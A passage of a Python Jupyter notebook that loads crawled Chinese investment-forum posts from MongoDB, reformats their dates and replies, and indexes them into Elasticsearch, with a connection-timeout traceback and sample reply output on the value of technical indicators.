\u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__data\u001b[0m\u001b[1;33m)\u001b[0m \u001b[1;32mor\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_refresh\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1190\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__manipulate\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1191\u001b[0m \u001b[0m_db\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__collection\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdatabase\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 160 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36m_refresh\u001b[1;34m(self)\u001b[0m\n\u001b[0;32m 1124\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__collection\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mdatabase\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mclient\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1125\u001b[0m self.__max_await_time_ms)\n\u001b[1;32m-> 1126\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__send_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1127\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1128\u001b[0m \u001b[1;32mreturn\u001b[0m \u001b[0mlen\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__data\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 161 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\cursor.py\u001b[0m in \u001b[0;36m__send_message\u001b[1;34m(self, operation)\u001b[0m\n\u001b[0;32m 929\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 930\u001b[0m response = client._send_message_with_response(\n\u001b[1;32m--> 931\u001b[1;33m operation, exhaust=self.__exhaust, address=self.__address)\n\u001b[0m\u001b[0;32m 932\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__address\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0mresponse\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0maddress\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 933\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__exhaust\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 162 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\mongo_client.py\u001b[0m in \u001b[0;36m_send_message_with_response\u001b[1;34m(self, operation, exhaust, address)\u001b[0m\n\u001b[0;32m 1143\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m__all_credentials\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1144\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_event_listeners\u001b[0m\u001b[1;33m,\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1145\u001b[1;33m exhaust)\n\u001b[0m\u001b[0;32m 1146\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1147\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m_reset_on_error\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mserver\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mfunc\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m*\u001b[0m\u001b[0margs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 163 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\mongo_client.py\u001b[0m in \u001b[0;36m_reset_on_error\u001b[1;34m(self, server, func, *args, **kwargs)\u001b[0m\n\u001b[0;32m 1154\u001b[0m \"\"\"\n\u001b[0;32m 1155\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m-> 1156\u001b[1;33m \u001b[1;32mreturn\u001b[0m \u001b[0mfunc\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m*\u001b[0m\u001b[0margs\u001b[0m\u001b[1;33m,\u001b[0m \u001b[1;33m**\u001b[0m\u001b[0mkwargs\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 1157\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mNetworkTimeout\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 1158\u001b[0m \u001b[1;31m# The socket has been closed. Don't reset the server.\u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 164 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\server.py\u001b[0m in \u001b[0;36msend_message_with_response\u001b[1;34m(self, operation, set_slave_okay, all_credentials, listeners, exhaust)\u001b[0m\n\u001b[0;32m 104\u001b[0m \u001b[1;32mtry\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 105\u001b[0m \u001b[0msock_info\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0msend_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mdata\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0mmax_doc_size\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 106\u001b[1;33m \u001b[0mreply\u001b[0m \u001b[1;33m=\u001b[0m \u001b[0msock_info\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mreceive_message\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mrequest_id\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 107\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0mexc\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 108\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0mpublish\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 165 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36mreceive_message\u001b[1;34m(self, request_id)\u001b[0m\n\u001b[0;32m 610\u001b[0m self.max_message_size)\n\u001b[0;32m 611\u001b[0m \u001b[1;32mexcept\u001b[0m \u001b[0mBaseException\u001b[0m \u001b[1;32mas\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 612\u001b[1;33m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0m_raise_connection_failure\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 613\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 614\u001b[0m \u001b[1;32mdef\u001b[0m \u001b[0m_raise_if_not_writable\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0munacknowledged\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 166 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36m_raise_connection_failure\u001b[1;34m(self, error)\u001b[0m\n\u001b[0;32m 741\u001b[0m \u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0mclose\u001b[0m\u001b[1;33m(\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 742\u001b[0m \u001b[1;32mif\u001b[0m \u001b[0misinstance\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0msocket\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 743\u001b[1;33m \u001b[0m_raise_connection_failure\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mself\u001b[0m\u001b[1;33m.\u001b[0m\u001b[0maddress\u001b[0m\u001b[1;33m,\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 744\u001b[0m \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 745\u001b[0m \u001b[1;32mraise\u001b[0m \u001b[0merror\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n", 167 | "\u001b[1;32mC:\\ProgramData\\Anaconda3\\lib\\site-packages\\pymongo\\pool.py\u001b[0m in \u001b[0;36m_raise_connection_failure\u001b[1;34m(address, error, msg_prefix)\u001b[0m\n\u001b[0;32m 281\u001b[0m \u001b[1;32mraise\u001b[0m \u001b[0mNetworkTimeout\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmsg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 282\u001b[0m \u001b[1;32melse\u001b[0m\u001b[1;33m:\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[1;32m--> 283\u001b[1;33m \u001b[1;32mraise\u001b[0m \u001b[0mAutoReconnect\u001b[0m\u001b[1;33m(\u001b[0m\u001b[0mmsg\u001b[0m\u001b[1;33m)\u001b[0m\u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0m\u001b[0;32m 284\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n\u001b[0;32m 285\u001b[0m \u001b[1;33m\u001b[0m\u001b[0m\n", 168 | "\u001b[1;31mAutoReconnect\u001b[0m: 10.18.6.46:27001: [WinError 10060] 由于连接方在一段时间后没有正确答复或连接的主机没有反应,连接尝试失败。" 169 | ] 170 | } 171 | ], 172 | "source": [ 173 | "url_set = set()\n", 174 | "for item in doc.find():\n", 175 | " creator=item.get('creator')\n", 176 | " title=item.get('title')\n", 177 | " content=item.get('content')\n", 178 | " resp_no=item.get('resp_no')\n", 179 | " createTime=item.get('createTime')\n", 180 | " \n", 181 | " url=item.get('url')\n", 182 | " if url in url_set:\n", 183 | " continue\n", 184 | " else:\n", 185 | " url_set.add(url)\n", 186 | " \n", 187 | " if createTime is None:\n", 188 | " save_db.insert_one({'url':url})\n", 189 | " continue\n", 190 | " \n", 191 | " createTime=datetime.datetime.strptime(createTime,'%Y-%m-%d %H:%M').strftime('%Y-%m-%dT%H:%M:%S')\n", 192 | "\n", 193 | " crawlTime=item.get('crawlTime')\n", 194 | " crawlTime=datetime.datetime.strptime(crawlTime,'%Y-%m-%d %H:%M:%S').strftime('%Y-%m-%dT%H:%M:%S')\n", 195 | "\n", 196 | " \n", 197 | " resp_list=item.get('resp')\n", 198 | " last_resp_date=item.get('last_resp_date')\n", 199 | " last_resp_date=datetime.datetime.strptime(last_resp_date,'%Y-%m-%d %H:%M').strftime('%Y-%m-%dT%H:%M:%S')\n", 200 | "\n", 201 | " _resp_list=[]\n", 202 | " for sub_resp in resp_list:\n", 203 | " resp_author = list(sub_resp.keys())[0]\n", 204 | " _resp_author=''.join(resp_author.split('_')[:-1])\n", 205 | " agree=sub_resp[resp_author][0]\n", 206 | " resp_content=sub_resp[resp_author][1]\n", 207 | " d={}\n", 208 | " d['resp_agree']=int(agree)\n", 209 | " d['resp_author']=_resp_author\n", 210 | " d['resp_content']=resp_content\n", 211 | "\n", 212 | " _resp_list.append(d)\n", 213 | " # last_resp_date=item.get('last_resp_date')\n", 214 | "\n", 215 | " body = {\n", 216 | " 'creator':creator,\n", 217 | " 'title':title,\n", 218 | " 'content':content,\n", 219 | " 'resp_no':int(resp_no),\n", 220 | " 'createTime':createTime,\n", 221 | " 'crawlTime':crawlTime,\n", 222 | " 'url':url,\n", 223 | " 'resp':_resp_list,\n", 224 | " 'last_resp_date':last_resp_date\n", 225 | " }\n", 226 | "\n", 227 | " es.index(index='jsl',doc_type='doc',body=body)" 228 | ] 229 | }, 230 | { 231 | "cell_type": "code", 232 | "execution_count": 23, 233 | "metadata": {}, 234 | "outputs": [ 235 | { 236 | "data": { 237 | "text/plain": [ 238 | "'2019-03-16 09:54:43'" 239 | ] 240 | }, 241 | "execution_count": 23, 242 | "metadata": {}, 243 | "output_type": "execute_result" 244 | } 245 | ], 246 | "source": [ 247 | "crawlTime" 248 | ] 249 | }, 250 | { 251 | "cell_type": "code", 252 | "execution_count": 19, 253 | "metadata": {}, 254 | "outputs": [ 255 | { 256 | "data": { 257 | "text/plain": [ 258 | "[{'resp_agree': 0,\n", 259 | " 'resp_author': 'seeker24680',\n", 260 | " 'resp_content': '可以说很多不明觉厉的词,适合用于忽悠别人,具体效果同风水先生。'},\n", 261 | " {'resp_agree': 0,\n", 262 | " 'resp_author': 'joyfulli',\n", 263 | " 'resp_content': '首先要知道技术指标是怎么来的\\n对过去的数据进行统计分析,然后进行预测\\n说白了就是统计学\\n所以,学过统计学就知道技术分析怎么用了'},\n", 264 | " {'resp_agree': 0, 'resp_author': '老高0813', 'resp_content': '基本没卵用'},\n", 265 | " {'resp_agree': 0, 'resp_author': 'z383788052', 'resp_content': '从来只看指标,只看k'},\n", 266 | " {'resp_agree': 0,\n", 267 | " 'resp_author': '花园小琴',\n", 268 | " 'resp_content': '看图形,一般只看低买高卖,但事后后悔,赚少了'},\n", 269 | " {'resp_agree': 0,\n", 270 | " 'resp_author': '风险搬运工',\n", 271 | " 'resp_content': '趋势(多和空)和震荡结合得做(同时做),不做单边、所谓轮动策略。\\n倾向于胜率低,赔率高的策略。'},\n", 272 | " {'resp_agree': 0,\n", 273 | " 'resp_author': 'smag',\n", 274 | " 'resp_content': '基本不看指标,静下心感受波动,在波动中下注。。。'},\n", 275 | " {'resp_agree': 0, 'resp_author': '海浪头头', 'resp_content': '同意美棠子的看法'},\n", 276 | " {'resp_agree': 0,\n", 277 | " 'resp_author': 'jsl0900',\n", 278 | " 'resp_content': '从技术指标上看,我可以预测所有交易标的的后续走势,至于准确不准确,那不是我关心的问题'},\n", 279 | " {'resp_agree': 4,\n", 280 | " 'resp_author': '美棠子',\n", 281 | " 'resp_content': '只是个辅助工具,基本面是核心,切不可颠倒主次。'},\n", 282 | " {'resp_agree': 0, 'resp_author': '蔓越橘', 'resp_content': '用于T一下可以,其他就算了吧。'}]" 283 | ] 284 | }, 285 | "execution_count": 19, 286 | "metadata": {}, 287 | "output_type": "execute_result" 288 | } 289 | ], 290 | "source": [ 291 | "_resp_list" 292 | ] 293 | }, 294 | { 295 | "cell_type": "code", 296 | "execution_count": null, 297 | "metadata": { 298 | "scrolled": true 299 | }, 300 | "outputs": [], 301 | "source": [ 302 | "for item in doc.find_one():\n" 303 | ] 304 | }, 305 | { 306 | "cell_type": "code", 307 | "execution_count": null, 308 | "metadata": {}, 309 | "outputs": [], 310 | "source": [ 311 | "db" 312 | ] 313 | } 314 | ], 315 | "metadata": { 316 | "kernelspec": { 317 | "display_name": "Python 3", 318 | "language": "python", 319 | "name": "python3" 320 | }, 321 | "language_info": { 322 | "codemirror_mode": { 323 | "name": "ipython", 324 | "version": 3 325 | }, 326 | "file_extension": ".py", 327 | "mimetype": "text/x-python", 328 | "name": "python", 329 | "nbconvert_exporter": "python", 330 | "pygments_lexer": "ipython3", 331 | "version": "3.7.0" 332 | } 333 | }, 334 | "nbformat": 4, 335 | "nbformat_minor": 2 336 | } 337 | --------------------------------------------------------------------------------